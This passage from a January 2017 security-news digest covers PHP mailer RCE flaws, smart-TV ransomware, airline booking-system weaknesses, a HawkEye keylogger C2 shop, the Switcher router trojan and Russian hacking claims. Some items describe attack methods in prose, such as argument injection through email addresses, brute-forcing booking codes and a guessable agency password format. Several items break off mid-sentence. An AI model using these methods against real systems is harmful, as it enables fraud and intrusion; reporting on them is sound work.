Another feature is multi-user site for example if you want to post on forum or blog. Sending your auth address to the site owner, it creates a new file and set your auth address as the valid signer. The site owner publishes a new “content.json” declaring that you can be signed a file.

Below the list of features implemented by ZeroNet:

Easy, zero configuration setup.
Password-less BIP32 based authorization: Your account is protected by the same cryptography as your Bitcoin wallet.
Real-time updated sites.
Namecoin .bit domains support.
SQL Database support: Allows for easier site development and faster page load times.
Anonymity: Full Tor network support with .onion hidden services instead of ipv4 addresses
TLS encrypted connections.
Automatic, uPnP port opening.
Plugin for multiuser (openproxy) support.
Works with any browser/OS.
ZeroNet users also have access to

ZeroBoard: Simple message board demo for dynamic content distribution
ZeroBlog: Self publishing blog demo
ZeroTalk: Decentralized, P2P forum demo
ZeroMail: End-to-end encrypted, distributed, P2P messaging site. To improve privacy it uses a BitMessage-like solution and will not expose the message recipient.
ZeroChat: The finished site for the tutorial of creating a server-less, SQL backed, real-time updated P2P chat application using ZeroNet in less than 100 lines of code
ZeroMe: Decentralized, Twitter-like P2P social network.
One of the questions in the FAQ session camptured my attention:

What happens when someone hosts malicious content?

The answer is very clear:

The ZeroNet sites are sandboxed, they have the same privileges as any other website you visit over the Internet. You are in full control of what you are hosting. If you find suspicious content you can stop hosting the site at any time.

Critical Updates — RCE Flaws Found in SwiftMailer, PhpMailer and ZendMail
3.1.2017 thehackernews
A security researcher recently reported a critical vulnerability in one of the most popular open source PHP libraries used to send emails that allowed a remote attacker to execute arbitrary code in the context of the web server and compromise a web application.
Disclosed by Polish security researcher Dawid Golunski of Legal Hackers, the issue (CVE-2016-10033) in PHPMailer used by more than 9 Million users worldwide was thought to be fixed with the release of version 5.2.18.
However, Golunski managed to bypass the patched version of PHPMailer that was given a new CVE (CVE-2016-10045), which once again put millions of websites and popular open source web apps, including WordPress, Drupal, 1CRM, SugarCRM, Yii, and Joomla, at risk of remote code execution attack.
PHPMailer eventually fixed the issue with an update, version 5.2.20. All versions of PHPMailer before this critical release are affected, so web administrators and developers are strongly recommended to update to the new version.
In addition to this bug, Golunski also reported a similar vulnerability in two other mailing libraries for PHP, SwiftMailer, and ZendMail, that could have also led to remote code execution attack.
RCE Flaw in SwiftMailer
SwiftMailer is also a popular PHP library used by many major open-source projects, including top PHP programming frameworks like Yii2, Laravel, Symfony for sending emails over SMTP.
The vulnerability (CVE-2016-10074) in SwiftMailer can be exploited in the same manner as the PHPMailer vulnerability by targeting web site components that use SwiftMailer class, such as contact/registration forms, password email reset forms, and so forth.
Attackers can execute arbitrary code remotely in the context of the web server, which could further be exploited to access a web server hosting a web application that used a vulnerable version of the library.
The SwiftMailer vulnerability affects all versions of the library, including the then-current release, version 5.4.5-DEV.
Golunski disclosed the vulnerability to SwiftMailer team, and developers acted fast to fix the issue, rolling out patched version 5.4.5 within a day.
"The mail transport (Swift_Transport_MailTransport) was vulnerable to passing arbitrary shell arguments if the "From," "ReturnPath" or "Sender" header came from a non-trusted source, potentially allowing Remote Code Execution," reads the changelog for SwiftMailer on GitHub.
RCE Flaw in ZendMail

ZendMail is a component of a very popular PHP programming framework Zend Framework with more than 95 Million installations.
The critical vulnerability (CVE-2016-10034) in ZendMail can also be exploited in the same manner as one discovered in PHPMailer and SwiftMailer by targeting web site components that use ZendMail, like contact/registration forms, password email reset forms, and so on.
Attackers could achieve remote code execution in the context of the web server and could remotely compromise the target web application that used the vulnerable version of the ZendMail.
The researcher reported the issue to ZendMail, and the developers fixed the vulnerability and rolled out the patched version.
"When using the zend-mail component to send email via the Zend\Mail\Transport\Sendmail transport, a malicious user may be able to inject arbitrary parameters to the system sendmail program," ZendMail wrote in a blog post.
"The attack is performed by providing additional quote characters within an address; when unsanitized, they can be interpreted as additional command line arguments, leading to the vulnerability."
Golunski has released a proof-of-concept video demonstration that will show all the three attacks in action.


Golunski has also released a dedicated website, nicknamed PwnScriptum, with a logo that contains all the information about the vulnerabilities in PHPMailer, SwiftMailer, and ZendMail in one place.
The researcher will soon be revealing a security white-paper with previously unknown exploitation vectors and techniques that can be used to exploit all the 3 vulnerabilities.

It has happened again, ransomware infected an LG Smart TV
3.1.2017 securityaffairs

The software engineer Darren Cauthon reported his LG Smart TV was infected with ransomware on Christmas day, the malware asked for $500 to unlock the device
IoT Ransomware is a scaring reality, the threat will increase in the next months and security firms have been warning IT industry. Routers, smart TV, and CCTVs are all potential victims of such category of malware.

The latest incident in order of time involved an LG smart TV, the software engineer Darren Cauthon reported the device of one of his family members was infected with ransomware on Christmas day.

The TV got the ransomware when the programmer’s wife downloaded an app to the TV promising free movies, it was a ransomware demanding of US$500 to unlock the device.

The ransomware appears to be a version of the Cyber.Police ransomware, also known as FLocker and Frantic Locker.

LG Smart TV ransomware

FLocker isn’t a new threat, it has been around for a year and crooks delivered it to the victims via spam SMS campaigns or sharing malicious links.

The FLocker ransomware was first spotted on May 2015, security experts from Trend Micro detected more than 7,000 strains of the same malware. The threat actors behind the FLocker ransomware has updated over the time the threat improving it and making had its detection by security solutions. Over the past few months, the experts observed a number of spikes and drops in the number of iterations released in the wild, in the last wave of infection observed in the mid-April 2016 the researchers detected over 1,200 variants.

LG Smart TV ransomware
Visualizza l'immagine su Twitter
Darren Cauthon @darrencauthon
Family member's tv is bricked by Android malware. #lg wont disclose factory reset. Avoid these "smart tvs" like the plague.
19:59 - 25 Dic 2016
3.450 3.450 Retweet 2.836 2.836 Mi piace
Darren Cauthon’s LG smart TV runs Google TV, a project discontinued by Google in June 2014.

Currently, LG has moved to WebOS, an open-source Linux kernel-based multitask operating system.

Cauthon tried to reset the TV to factory settings, but the reset procedure available online didn’t work, so he decided to contact the customer service. The man was invited to go to a service center for assistance that implied a $340 bill for the support.

Resuming, the Ransomware asked for $500 to unlock the device, but the sad news is that also LG asks a $340 bit of the support.

The story has a happy ending, LG provided hidden reset instructions to remove the ransomware from the LG Smart TV.

The company offered factory reset steps which are not publicly available.

Below the video shared by The Register:

“With the TV powered off, place one finger on the settings symbol then another finger on the channel down symbol. Remove finger from settings, then from channel down, and navigate using volume keys to the wipe data/ factory reset option.” states the The Register.
25 Dic
Darren Cauthon @darrencauthon
Family member's tv is bricked by Android malware. #lg wont disclose factory reset. Avoid these "smart tvs" like the plague. pic.twitter.com/kNz9T1kA0p
Darren Cauthon @darrencauthon
The TV is saved! Thanks to LG for providing the factory reset instructions. I recorded a YouTube video of the fix: https://youtu.be/0WZ4uLFTHEE pic.twitter.com/hV62r68uit
06:15 - 29 Dic 2016
Visualizza l'immagine su Twitter

#33C3- Changing travelers flight bookings is really too easy for hackers
2.1.2017 securityaffairs Hacking

Changing travelers flight bookings is too easy. Absolutely astounding the Karsten Nohl research on the insecurity of traveler flight information.
The current travel booking systems is deeply insecure, it lacks of cyber security by design and the notorious hackers Karsten Nohl and Nemanja Nikodijevic have demonstrated it at the 33rd Chaos Communications Congress held in Hamburg last week (“Where in the World Is Carmen Sandiego?”).

The experts explained that it is quite easy to modify any passenger’s reservation, cancel their flight bookings, and even use the refunds to book tickets for themselves.

The security duo has conducted for several months a research on security employed by the Global Distribution Systems (GDSs) that are used by various actors in the travel industry, including airlines, travel agencies, hotels and car rental companies.

Below the video of the presentation held during the 33rd Chaos Communications Congress.

GDSs are enormous archives containing all information about travel bookings, they include so-called Passenger Name Records (PNRs), records include information such as traveler’s name, itinerary, travel dates, ticket details, phone number, email, passport information, credit card numbers, seat numbers and baggage information. Travel data is precious for scammers and phishers that could use them to launch targeted attacks and organize complex frauds.

As explained by the experts the most important GDS operators in the world are Sabre, Travelport, and Amadeus. The disconcerting discovery made by the researcher is that it is possible to add or modify any travel data by accessing the system with a last name and a six-character booking code.

We have to think GDSs as systems accessible from everywhere, access points could be airline websites, travel agencies, and also third-party websites like CheckMyTrip. Every time a travel includes flights with different airlines the booking can be modified through the websites of any of the airlines that operate the trip.

Attackers could cancel a flight, and if the booking allows the change crooks could use the credit given by the airline to book a new ticket.

Unfortunately, the level of protection for the PNR is very poor, the booking code is easy to obtain, it is printed on luggage tags and is also embedded in the QR codes printed on the tickets.

Passengers use to throw away old Boarding Pass even when the overall travel isn’t yet completed, or even worse, they post on social networks the pictures of the tickets.

We explained in the past that Boarding Pass contains personal information that could be exploited by hackers.

The popular investigator Brian Krebs published an interesting post on the topic explaining that a Boarding Pass Barcode contains a lot of data.

flight bookings boarding pass barcode

Experts highlighted that there is no logging implemented in the GDSs, this means that is impossible to discriminate the accesses.

“In the short term, at the very least we should expect websites that give access to travelers’ personal information to have the bare minimum of web security, and this includes at the very least some rate limiting,” the researcher said. “And until passwords and other security measures become common, I think we have a right to know who accesses our records and there must be some accountability, especially knowing how insecure these systems are today.” explained Nohl.

Karsten Nohl and Nemanja Nikodijevic explained that many airline and trip checking websites don’t limit the number of bad codes users can enter before they’re blocked, opening the door to brute force code-guessing attacks.

The duo demonstrated that it is a question of minutes to find matching booking codes for popular last names by using automated methods. Working with GDSs brute force code-guessing attacks are very easy because the systems use only uppercase letters. The researchers explained that one of GDS analyzed doesn’t use 1 and 0 to avoid confusion with the letters I and O, two other GDSs increase the codes sequentially making easier for an attacker to guess the code withing a sequence.

“The travel agencies have their own master logins into the GDSs and these accounts have very weak passwords. In one case the password was WS, which stands for web service, followed by the date when the login was created in DDMMYY format. This can easily be brute-forced and unfortunately it was one of the most complex travel agency passwords the researchers observed.” reported CSOonline.

The lack of security could be exploited by crooks to add their frequent flier number to other passengers’ long-haul flights in order gain the reward miles for themselves.

As demonstrated by the experts, hackers can do much more than change flight bookings,

UK security minister: ISIS would launch chemical attacks in the UK
2.1.2017 securityaffairs Cyber

The ISIS seeking to launch mass-casualty chemical attacks in Europe said security minister Ben Wallace.
The UK security minister Ben Wallace declared terror group wants to carry out mass casualty attack in Britain UK by ‘whatever means possible.’
According to the minister, members of the ISIS have “no moral barrier” to using chemical weapons against the helpless population.

“They have no moral objection to using chemical weapons against populations and if they could, they would in this country.” said Wallace.

“The casualty figures which could be involved would be everybody’s worst fear.”

“We have certainly seen reports of them using it in Syria and Iraq [and] we have certainly seen aspiration for it in Europe.”

He confirmed that there were reports of ISIS using chemical weapons in the areas under its control in Syria and Iraq. Moroccan authorities had apprehended a cell in February which was

The report quotes Moroccan authorities had arrested a cell of terrorists in February which was in possession of substances that could be used to make either a chemical weapon.

Wallace also cited a recent report issued by the Europol that warned of the chemical threat.

In December 2015, a European Parliament report has confirmed the ISIS organization has already smuggled CBRN material into the EU and warned of WMD attacks.
The report confirmed the ISIS was recruiting foreign fighters with specific competencies in physics, chemistry, and computer science.

“ISIL/Da’esh has recruited and continues to recruit hundreds of foreign fighters, including some with degrees in physics, chemistry and computer science, who experts believe have the ability to manufacture lethal weapons from raw substances.”

Now Wallace told the Sunday Times that the ISIS plans to conduct “definitely mass casualty attacks” to harm as many people as possible.

Commenting the US sanctions on Russians for the alleged interference in the presidential election, Wallace warned of a possible inside threat. Terrorist groups and foreign governments all launched a campaign to recruit “traitors” in UK Government, the military and leading businesses.
“There are traitors. We have to be on our guard for the enemy within,” he said.

“The insider threat, as we would call it, is real and it can be exploited and there are people trying to do that as we speak.”

Trump will soon reveal the truth about the alleged Russian hacking
2.1.2017 securityaffairs Hacking

President Donald J. Trump is expressing skepticism about intelligence assessments of the Russian hacking and will provide more information very soon.
The executive order issued by President Obama in retaliation of the alleged Russian interference on Presidential Election is raising a heated debate on the on the measures adopted by the US Government and its ability to provide evidence of Russian malicious cyber activities.

The US ejected 35 Russian intelligence operatives from the United States and imposed sanctions on nine entities and individuals.The US Government sanctioned the Russian intelligence services, the GRU (Russian Main Intelligence Directorate) and the FSB (Federal Security Service), four GRU officers, and three other organizations.

The report published by the US Government doesn’t provide any new info, all the information it includes were already reported in the analysis conducted by security firms such as Crowdstrike.

In June, the security research firm CrowdStrike reported on a cyber breach of the Democratic National Committee (DNS). CrowdStrike’s incident response time discovered not one, but two hacking groups that it considers “some of the best adversaries out of the all the numerous nation-state” groups the company encounters daily – COZY BEAR and FANCY BEAR.

This is exactly the same info that we have found in the JAR report published by the US Government that linked the cyber activity to a Russian threat actor designated as GRIZZLY STEPPE.

Security experts at the security firm Wordfence published an interesting report in which they analyzed the PHP malware sample and the IP addresses that the US government has provided as proof the involvement of Russian hackers in the attacks against the Presidential Election.

“We used the PHP malware indicator of compromise (IOC) that DHS provided to analyze the attack data that we aggregate to try to find the full malware sample. We discovered that attackers use it to try to infect WordPress websites. We found it in the attacks that we block.”

Experts from Wordfence traced the malware code to a tool available online, dubbed P.A.S., that claims to be “made in Ukraine.”

“One might reasonably expect Russian intelligence operatives to develop their own tools or at least use current malicious tools from outside sources,” the report says.

The report published by WordFence includes the list of IP addresses that “don’t appear to provide any association with Russia” and “are probably used by a wide range of other malicious actors.”

“The malware sample is old, widely used and appears to be Ukrainian. It has no apparent relationship with Russian intelligence and it would be an indicator of compromise for any website.” reads the report from WordFence.

The IT security industry is aware of the Russian interference, but clearly, the analysis provided by the US Government is really poor of interesting elements.

Which is the position of President-elect Donald J. Trump on the Russian hacking?

We all know that alleged Russian interference aimed to disrupt Clinton’s campaign due to the relationship between Puting and Trump.

President Donald J. Trump is expressing skepticism about intelligence assessments of the Russian hacking and the Kremlin’s interference in the election.

Trump Russian Hacking

According to the NYT, speaking to reporters outside his Palm Beach, Fla., club, Mar-a-Lago on Saturday evening, he revealed to know of “things that other people don’t know” about the alleged hacking campaigns that targeted Presidential Election. Trump announced that he will share the information “on Tuesday or Wednesday.”

“I just want them to be sure because it’s a pretty serious charge,” said Mr. Trump.“If you look at the weapons of mass destruction, that was a disaster, and they were wrong,” he added, referring to intelligence cited by the George W. Bush administration to support its march to war in 2003. “So I want them to be sure,” the president-elect said. “I think it’s unfair if they don’t know.”

“If you look at the weapons of mass destruction, that was a disaster, and they were wrong,” he added, referring to intelligence reports that were provided the George W. Bush administration in 2003. “So I want them to be sure,” “I think it’s unfair if they don’t know.”

“And I know a lot about hacking. And hacking is a very hard thing to prove. So it could be somebody else. And I also know things that other people don’t know, and so they cannot be sure of the situation.”

The Trump’s approach to technology is anachronistic, he advised people to avoid computers when dealing with a delicate material.
“It’s very important, if you have something really important, write it out and have it delivered by courier, the old-fashioned way, because I’ll tell you what, no computer is safe,” Mr. Trump said.
“I don’t care what they say, no computer is safe,” he added. “I have a boy who’s 10 years old; he can do anything with a computer. You want something to really go without detection, write it out and have it sent by courier.”

The only sensible answer to date is that of Russian President Putin who avoided responding Obama executive order.

Firefox 52 more privacy oriented with a Tor protection mechanism
2.1.2017 securityaffairs Safety
Mozilla development team announced a new privacy protection mechanism that will come with Firefox 52, it aims to prevent websites from fingerprinting users.
Mozilla announced the introduction of a new privacy protection mechanism to Firefox 52 that prevents websites from fingerprinting through system fonts.

The technique is widely adopted by advertising companies via hidden scripts delivered with ads that take the list of local fonts and along with other data create a unique fingerprint (ID) for each user.

The companies aim in this was to deliver targeted ads and track users across the web.

The experts at Mozilla have implemented a feature to only expose whitelisted system fonts to avoid fontlist fingerprinting. The new feature will be included in the stable branch of Firefox 52, scheduled for release on March 7, 2017.

The user privacy protection mechanism was already implemented by Mozilla in the Tor Browser, it was developed to block websites from identifying visitors based on the fonts installed on their machines.

The font fingerprinting protection is already available in Firefox 52 Beta.

“Defending against font fingerprinting is complex. We have to worry about distinguishing attacks via differing installed font sets, text rendering engine differences, and font variants. There are a variety of tickets involved.” states the Tor Development Team.

“In #13313, we introduced a Tor Browser pref, “font.system.whitelist”, which accepts a list of fonts and excludes all others from the browser.”

How does the feature work?

The feature leverages a whitelist of system fonts for each operating system, the browser will not block queries for system fonts but it will provide the same answer for every user making impossible to discriminate them.

The practice of font fingerprinting relies on website operators deploying Flash or JS scripts that query the user’s browser for a list of locally installed fonts.

The news confirms the intention of Mozilla to protect users’ privacy, in July the development team launched the Tor Uplift project, a significant effort in improving privacy features implemented in FireFox.

“To uplift all of the Tor Browser patches to mainline Firefox. The general approach is to add preferences for anything that breaks the web and set them to default “off” so that the behavior of default Firefox does not change. All bugs are tagged with [tor]. The Tor Browser design document is here.” states the description of the project.

A new iPhone bug will crash the Messages app with a single text
1.1.2017 securityaffairs Apple

A researcher discovered that a single text message could be exploited to crash the Messages app by MMS on iOS due to a recently discovered bug
A single text message could be exploited to disable the Messages app on any iPhone due to a recently discovered bug.

The bug flaw makes the Apple Message app inoperable, making it impossible to read text messages or iMessages. The flaw is serious, the app will continue to crash even when the user closes it or reboot the device
In order to exploit the flaw, it is necessary to send to the target device a vCard (a transferable Address Book contact) containing so many lines of code that the Messages app is not able to process.

When the Messages app opens the message containing the vCard, it tries to open it and freezes displaying a white screen.
Below a video PoC of the vulnerability.

Because the Messages app always tries to open the most recent text message when it is launched, it will continue trying to open the malicious message even when the app is closed or the whole phone is rebooted.
“When you click, iOS want to read the text, the text in the file is very complicated for the system and cause a CPU average: the app freeze. You close the app, want to reopen but iOS want to reload the previous message but can’t because it’s the vcf file.” reads the blog post published by vincedes3.

The bug is similar to the “Effective Power” discovered in May 2015, when users noticed that a text message containing a string of Arabic text would crash phones.

Back to the present, there is a good news for those users that have received the malicious message. There at least two workarounds to remove the message from the top of the inbox:

By clicking this Fix link: vincedes3.com/save.html, it will open the window for sending a new message, pressing cancel and deleting the malicious message.
Visualizza l'immagine su Twitter
Visualizza l'immagine su Twitter
vincedes3 @vincedes3
For devices (including iPad) where the fix link does not work, ask Siri to send a message to the victim and click on the text.
11:27 - 29 Dic 2016
9 9 Retweet 12 12 Mi piace
By sending yourself a message in Siri, or ask someone else to send you a message. Once the message is received the Messages app will allow you to open the new message instead of the malicious one.
29 Dic
vincedes3 @vincedes3
For devices (including iPad) where the fix link does not work, ask Siri to send a message to the victim and click on the text. pic.twitter.com/3id4Y8Lhkn
Luca Marzano @marzanoluca93
@vincedes3 pic.twitter.com/S37I4MVUPe
16:33 - 30 Dic 2016
Visualizza l'immagine su Twitter

Visualizza l'immagine su Twitter

One-stop-shop: Server steals data then offers it for sale
1.1.2017 Kaspersky
While intercepting traffic from a number of infected machines that showed signs of Remote Admin Tool malware known as HawkEye, we stumbled upon an interesting domain. It was registered to a command and control server (C2) which held stolen keylog data from HawkEye RAT victims, but was also being used as a one-stop-shop for purchasing hacking goods.

WhiteHats on the prowl?

Before diving into an analysis of the server, it is worth pointing out some interesting behavior spotted in several of the victims’ stolen accounts. A group of WhiteHat hackers who call themselves Group Demóstenes were found to be working around the clock, trawling the internet and looking to exfiltrate stolen data from C2 servers. When such a server was found, the group looked for a backdoor that would give them control over the filesystem. They would then monitor the incoming, stolen data. Either manually or automatically, they would collect the stolen credentials and send emails to the victims’ accounts. These emails contained an attachment with proof that the user’s machine has been compromised. In addition, they advise the user to change passwords immediately and offer to help.

Hi ***********

Our SERVERS detected information from a server on the US, we don’t even know goverment or another sourse …. we send a file with all your logins and passwords of all your accounts from hxxp://www.p******op[.]biz/*******
Seme you verify this information. it’s better thing we hurt all change password on the other computer Because Called Computer

Local Time: 03.10.2016. 18:45:02
Installed Language: en-
Net Version: 2.0.50727.5485
Operating System Platform: Win32NT
Operating System Version: 6.1.7601.65536
Operating System: Microsoft Windows 7 Home Premium
Internal IP Address:
External IP Address:
Installed Anti virus: Avast Antivirus
Installed Firewall:

have a keylogger harm report All That You write, messages, passwords or more.

¿Why we do it?
We have a Cause Called Group Demóstenes looking for Ciber attacks and false info.
Please Donate by PayPal at h**cg**an@gmail[.]com 5 USD or more, Because this is only our ingress.


The email above appears in two languages, English and Spanish. The name of the group appears to be of Portuguese origin, though it is not certain.

The shopfront: the command and control servers

Scanning for network services which are running on the C2, we discovered that it contains not only a back-end for storing stolen credentials but also a front-end for selling some of them, alongside many other “goods”.

Browsing the domain that communicated with the HawkEye RAT samples disclosed a login page. Given the fact that the server was newly operational, it allowed users to register an account and login to purchase the goods on offer.

One-stop-shop: Server steals data then offers it for sale

After registering on the C2 web application, there was no sign of the stolen data transferred from compromised machines. A forum-like web page opens up once a successful login is being processed.

One-stop-shop: Server steals data then offers it for sale

The C2 was meant to securely store the stolen data; however, it contained a crucial vulnerability which allowed researchers to download the stolen data.

The C2 owners seem to have added six new Shell scripts on 22 November, just a week before the research started – a further indication of how new the operation is.

One-stop-shop: Server steals data then offers it for sale

Another item for sale is scam pages, and some are multilingual. The attackers also reveal the scope of their victims, noting those who are registered to Amazon, Apple, Netflix and even National Bank of Australia and Barclays. The listing of the year next to the banking information probably refers to how up-to-date the scam pages are in terms of the bank’s website updates.

One-stop-shop: Server steals data then offers it for sale

The attackers have spared no details and have added additional information regarding how one should act when using their services, and who to contact in the Support tab.

One-stop-shop: Server steals data then offers it for sale

To purchase goods in the private shop you must deposit money into your account on the website. The attackers accept Bitcoins, PerfectMoney and WebMoney.

One-stop-shop: Server steals data then offers it for sale

Back to the stolen data

As we described, HawkEye is a robust keylogger that can hijack keystrokes from any application being opened on the victim’s PC. It can also identify login events and record the destination, username and password. It is, however, limited to two-factor authentication and single sign-on.

Stolen credentials on the server were found to be holding sensitive access passwords to government, healthcare, banking and payment web applications. Among them is the following web server which belongs to the Pakistani government.

One-stop-shop: Server steals data then offers it for sale

As mentioned, hundreds of machines were found to be compromised by just one C2. The following is a partial list of what was downloaded from the malicious server.

One-stop-shop: Server steals data then offers it for sale

Usually, careless threat actors forget to remove test files which might contain sensitive data. In this case, we were able to obtain the attackers credentials from one very small file that was captured when searching related strings.

Target geography

The research is still ongoing and is currently affecting users located in APAC, such as Japan, Thailand and India, as well as parts of Eastern Europe such as Russia and Ukraine.

Switcher: Android joins the ‘attack-the-router’ club
1.1.2017 Kaspersky Android
Recently, in our never-ending quest to protect the world from malware, we found a misbehaving Android trojan. Although malware targeting the Android OS stopped being a novelty quite some time ago, this trojan is quite unique. Instead of attacking a user, it attacks the Wi-Fi network the user is connected to, or, to be precise, the wireless router that serves the network. The trojan, dubbed Trojan.AndroidOS.Switcher, performs a brute-force password guessing attack on the router’s admin web interface. If the attack succeeds, the malware changes the addresses of the DNS servers in the router’s settings, thereby rerouting all DNS queries from devices in the attacked Wi-Fi network to the servers of the cybercriminals (such an attack is also known as DNS-hijacking). So, let us explain in detail how Switcher performs its brute-force attacks, gets into the routers and undertakes its DNS-hijack.

Clever little fakes

To date, we have seen two versions of the trojan:

acdb7bfebf04affd227c93c97df536cf; package name – com.baidu.com
64490fbecefa3fcdacd41995887fe510; package name – com.snda.wifi
The first version (com.baidu.com), disguises itself as a mobile client for the Chinese search engine Baidu, simply opening a URL http://m.baidu.com inside the application. The second version is a well-made fake version of a popular Chinese app (http://www.coolapk.com/apk/com.snda.wifilocating) for sharing information about Wi-Fi networks (including the security password) between users of the app. Such information is used, for example, by business travelers to connect to a public Wi-Fi network for which they don’t know the password. It is a good place to hide malware targeting routers, because users of such apps usually connect with many Wi-Fi networks, thus spreading the infection.

The cybercriminals even created a website (though badly made) to advertise and distribute the aforementioned fake version of com.snda.wifilocating. The web server that hosts the site is also used by the malware authors as the command-and-control (C&C) server.

The infection process

The trojan performs the following actions:

Gets the BSSID of the network and informs the C&C that the trojan is being activated in a network with this BSSID
Tries to get the name of the ISP (Internet Service Provider) and uses that to determine which rogue DNS server will be used for DNS-hijacking. There are three possible DNS servers –, and; with being the default choice, while the others will be chosen only for specific ISPs
Launches a brute-force attack with the following predefined dictionary of logins and passwords:
The trojan gets the default gateway address and then tries to access it in the embedded browser. With the help of JavaScript it tries to login using different combinations of logins and passwords. Judging by the hardcoded names of input fields and the structures of the HTML documents that the trojan tries to access, the JavaScript code used will work only on web interfaces of TP-LINK Wi-Fi routers

If the attempt to get access to the admin interface is successful, the trojan navigates to the WAN settings and exchanges the primary DNS server for a rogue DNS controlled by the cybercriminals, and a secondary DNS with (the Google DNS, to ensure ongoing stability if the rogue DNS goes down). The code that performs these actions is a complete mess, because it was designed to work on a wide range of routers and works in asynchronous mode. Nevertheless, I will show how it works, using a screenshot of the web interface and by placing the right parts of the code successively.

If the manipulation with DNS addresses was successful, the trojan report its success to the C&C

So, why it is bad?

To appreciate the impact of such actions it is crucial to understand the basic principles of how DNS works. The DNS is used for resolving a human-readable name of the network resource (e.g. website) into an IP address that is used for actual communications in the computer network. For example, the name “google.com” will be resolved into IP address In general, a normal DNS query is performed in the following way:

When using DNS-hijacking, the cybercriminals change the victim’s (which in our case is the router) TCP/IP settings to force it to make DNS queries to a DNS server controlled by them – a rogue DNS server. So, the scheme will change into this:

As you can see, instead of communicating with the real google.com, the victim will be fooled into communicating with a completely different network resource. This could be a fake google.com, saving all your search requests and sending them to the cybercriminals, or it could just be a random website with a bunch of pop-up ads or malware. Or anything else. The attackers gain almost full control over the network traffic that uses the name-resolving system (which includes, for example, all web traffic).

You may ask – why does it matter: routers don’t browse websites, so where’s the risk? Unfortunately, the most common configuration for Wi-Fi routers involves making the DNS settings of the devices connected to it the same as its own, thus forcing all devices in the network use the same rogue DNS. So, after gaining access to a router’s DNS settings one can control almost all the traffic in the network served by this router.

The cybercriminals were not cautious enough and left their internal infection statistics in the open part of the C&C website.

According to them, they successfully infiltrated 1,280 Wi-Fi networks. If this is true, traffic of all the users of these networks is susceptible to redirection.


The Trojan.AndroidOS.Switcher does not attack users directly. Instead, it targets the entire network, exposing all its users to a wide range of attacks – from phishing to secondary infection. The main danger of such tampering with routers’ setting is that the new settings will survive even a reboot of the router, and it is very difficult to find out that the DNS has been hijacked. Even if the rogue DNS servers are disabled for some time, the secondary DNS which was set to will be used, so users and/or IT will not be alerted.

We recommend that all users check their DNS settings and search for the following rogue DNS servers:
If you have one of these servers in your DNS settings, contact your ISP support or alert the owner of the Wi-Fi network. Kaspersky Lab also strongly advises users to change the default login and password to the admin web interface of your router to prevent such attacks in the future.

Alleged Russian operation has compromised a laptop at a Vermont utility

31.12.2016 securityaffairs Cyber

The code associated with Russian hacking operation dubbed Grizzly Steppe by the Obama administration infected a laptop at a Vermont utility.
Russian hackers are again in the headlines because according to US officials, they hacked a Vermont utility, raising concerns about the security of the electrical grid of the country.

Researchers discovered on a laptop a malware associated with operations of Russian hackers, the experts linked it with an outdated Ukrainian hacking tool.

The malware was discovered thanks to the sharing of information contained in the Grizzly Steppe JAR about Russian malicious cyber activities.

DHS and FBI along with the report released a sample of the malware code allegedly used in the Grizzly Steppe operation. The code was shared with executives from multiple industries in the US allowing the experts at Burlington Electric in Vermont to discover the intrusion.

“A code associated with the Russian hacking operation dubbed Grizzly Steppe by the Obama administration has been detected within the system of a Vermont utility, according to U.S. officials.” states the report published by the Washington Post.

“Burlington Electric said in a statement that the company detected a malware code used in the Grizzly Steppe operation in a laptop that was not connected to the organization’s grid systems. The firm said it took immediate action to isolate the laptop and alert federal authorities.”

The malicious code was spotted during a scan of a company laptop that was anyway not connected to the grid. The authorities immediately adopted the necessary measures to contain the threat.

“We took immediate action to isolate the laptop and alerted federal officials of this finding. Our team is working with federal officials to trace this malware and prevent any other attempts to infiltrate utility systems. We have briefed state officials and will support the investigation fully,” the statement said.

This means that fortunately, at least in this specific case, did not penetrate the US grid.

“Vermonters and all Americans should be both alarmed and outraged that one of the world’s leading thugs, Vladimir Putin, has been attempting to hack our electric grid, which we rely upon to support our quality-of-life, economy, health, and safety,” explained the Vermont Governor Peter Shumlin.

“This episode should highlight the urgent need for our federal government to vigorously pursue and put an end to this sort of Russian meddling,” he said.

Security experts at the security firm Wordfence published an interesting report in which they analyzed the PHP malware sample and the IP addresses that the US government has provided as proof the involvement of Russian hackers in the attacks against the Presidential Election.

“As an interesting side-project, we performed analysis on the PHP malware sample and the IP addresses that the US government has provided as “…technical details regarding the tools and infrastructure used by Russian civilian and military intelligence services (RIS)”. [Source]” states the report published by WordFence.

“We used the PHP malware indicator of compromise (IOC) that DHS provided to analyze the attack data that we aggregate to try to find the full malware sample. We discovered that attackers use it to try to infect WordPress websites. We found it in the attacks that we block.”

Experts from Wordfence traced the malware code to a tool available online, dubbed P.A.S., that claims to be “made in Ukraine.”

The FBI/DHS JAR refers the version 3.1.7, while the most current version it the 4.1.1b.

“One might reasonably expect Russian intelligence operatives to develop their own tools or at least use current malicious tools from outside sources,” the report says.

The report published by WordFence includes the list of IP addresses that “don’t appear to provide any association with Russia” and “are probably used by a wide range of other malicious actors.”

15% of IP addresses are associated with Tor exit nodes.

“The malware sample is old, widely used and appears to be Ukrainian. It has no apparent relationship with Russian intelligence and it would be an indicator of compromise for any website.” reads the report from WordFence.

The rest of the story is known, the Obama administration accused the Russian government of interference in internal affairs and ejected 35 Russian diplomats and blocking access to two leisure compounds used by Russian Foreign Ministry personnel.

In 2017: Cool New Tech, Ominous Cyber Threats & Increased Terrorism in the West
31.12.2016 securityaffairs Security

A lot of new and exciting technology will emerge or become more prominent in 2017 and the following is just a glimpse of what is anticipated.
IoT & Smart Home Tech

Smart home technology had been in the works for years before finally getting off to a relatively slow start. But, now that large companies like Apple, Amazon and Google have jumped onboard, smart home tech is expected to significantly pick up the pace in 2017.


In 2016, Oculus Rift was released, following which thousands of virtual reality (VR) games and apps were released on the market. And, augmented reality (AR) game, Pokémon Go, exploded on the market with over 100 million downloads. In 2017, however, VR and AR are expected to really take off.

Machine Learning

Machine learning will advance in 2017, paving the way for it to become a fixture in the workplace. This type of artificial intelligence (AI) is expected to become a component of every type of technology. For instance, robotic journalists have been in circulation for a couple of years now and this trend is expected to expand exponentially in the white collar arena. It will have a lot of impact on the job market because some positions will no longer be needed. But, the combination of automation and machine learning will usher in groundbreaking efficiency in the workplace.

Autonomous driving

More advances from makers of self-driving cars are expected. For example, since initially introducing its ‘Autopilot‘ feature in 2015, Tesla has been continuously tweaking the autonomous capabilities of its vehicles. This highlights the far-reaching capabilities self-driving technologies hold for the future. Additionally, Uber recently acquired self-driving hardware developer Otto and has subsequently put its first fleet of self-driving trucks on the road. In Pittsburgh, Uber has also conducted some real world self-driving tests with its cabs.

Chinese Technology Will Make More Significant Inroads Into the West

